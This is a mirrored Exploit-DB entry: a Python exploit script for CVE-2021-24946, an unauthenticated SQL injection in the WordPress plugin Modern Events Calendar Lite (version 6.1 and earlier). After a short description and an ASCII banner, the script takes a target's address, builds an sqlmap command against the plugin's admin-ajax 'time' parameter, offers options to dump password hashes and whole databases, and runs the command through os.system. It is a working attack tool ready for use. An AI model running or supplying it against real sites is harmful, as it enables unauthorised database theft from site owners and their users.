WordPress Plugin Modern Events Calendar V 6.1 – SQL Injection (Unauthenticated)

Exploit Database
135 阅读

作者： Ron Jost

日期： 2022-01-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50687/

# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)

# Date 26.01.2022

# Exploit Author: Ron Jost (Hacker5preme)

# Vendor Homepage: https://webnus.net/modern-events-calendar/

# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip

# Version: <= 6.1

# Tested on: Ubuntu 20.04

# CVE: CVE-2021-24946

# CWE: CWE-89

# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''

Description:

The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter

before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,

leading to an unauthenticated SQL injection issue

'''

#Banner:

banner = '''

.oOOOo.o'O o.OOoOoo

.O oO oO .oOOo. .oOOo. .oOOo.oO .oOOo. o O.oOOo. o O.oOOo.

o o OoO OoO OO O oOo O oO

o o oooOO o oOo oo o ooO o oo

o OO'O ooooooooo O' oo O' O ooooooooo O' OooOOo <code>OooOo OooOOo OoOOo.

O </code>oooO OOO oO O O OOO

o .o</code>oO O.OoO.OO.Oo o oOo

OoooO'</code>o' ooOooOoO oOoOoO <code>OooO' oOoOoO OooOO oOoOoO O</code>OooO' O`OooO'

[+] Modern Events Calendar Lite SQL-Injection

[@] Developed by Ron Jost (Hacker5preme)

'''

print(banner)

import requests

import argparse

from datetime import datetime

import os

# User-Input:

my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')

my_parser.add_argument('-T', '--IP', type=str)

my_parser.add_argument('-P', '--PORT', type=str)

my_parser.add_argument('-U', '--PATH', type=str)

args = my_parser.parse_args()

target_ip = args.IP

target_port = args.PORT

wp_path = args.PATH

# Exploit:

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

print('[*] Payload for SQL-Injection:')

exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '

exploitcode_risk = ' -p time'

print('Sqlmap options:')

print(' -a, --all Retrieve everything')

print(' -b, --bannerRetrieve DBMS banner')

print(' --current-userRetrieve DBMS current user')

print(' --current-dbRetrieve DBMS current database')

print(' --passwords Enumerate DBMS users password hashes')

print(' --tablesEnumerate DBMS database tables')

print(' --columns Enumerate DBMS database table column')

print(' --schemaEnumerate DBMS schema')

print(' --dumpDump DBMS database table entries')

print(' --dump-allDump all DBMS databases tables entries')

retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')

exploitcode = exploitcode_url +retrieve_mode + exploitcode_risk

os.system(exploitcode)

print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))